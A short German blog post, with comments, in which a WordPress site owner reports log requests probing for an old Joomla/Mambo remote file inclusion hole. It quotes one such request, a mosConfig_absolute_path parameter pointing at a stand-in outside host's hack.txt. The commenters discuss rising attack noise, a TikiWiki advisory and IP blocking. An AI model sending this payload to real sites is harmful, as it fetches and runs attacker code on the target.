Joomla CMS Hack

Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:

/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt

Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.

6 Kommentare
  1. Pepino sagte:

    Kann ich nur Bestätigen (die Einbruchsversuche)… allerdings scheinen die Täter nicht viel Know-How zu besitzen…

  2. Michael sagte:

    Mir graut es jedesmal wenn ich in meine Logfiles schaue. Was da an „Angriffen“ reinkommt ist nicht mehr lustig und es wird subjektiv immer mehr.

    @Moellus:

    Ist das gemeint: „Eine Schwachstelle in TikiWiki 1.9.8 kann von einem Angreifer dazu ausgenutzt werden, beliebigen Programmcode auf dem beherbergenden Rechnersystem auszuführen. Es ist bereits funktionierender Exploit Code in Umlauf und die Schwachstelle wird bereits aktiv ausgenutzt. Es ist noch kein Patch verfügbar, …“?

  3. Xel sagte:

    Och – das ist ne alte Lücke… müsste aber schon lange gestopft sein… (wobei denkbar währe, dass es eigentlich eher ne Mambo Lücke war – kann ich aber nicht genau sagen) so ungefähr seit Joomla eine Register Globals = „Off“ Emulation hat ;-)

    „allerdings scheinen die Täter nicht viel Know-How zu besitzen…“
    Glaubst du? Es ist weniger Aufwand den „Hack“versuch direkt zu begehen, als erst die Startseite zu laden und zu versuchen herauszufinden, ob denn das Zielsystem installiert ist.

    Was IPs angeht… Botnetze und Zobierechner sowie wechselnde IPs machen einem das Leben manchmal zur Hölle, wenn man IPs blocken möchte ;-)

Kommentare sind deaktiviert.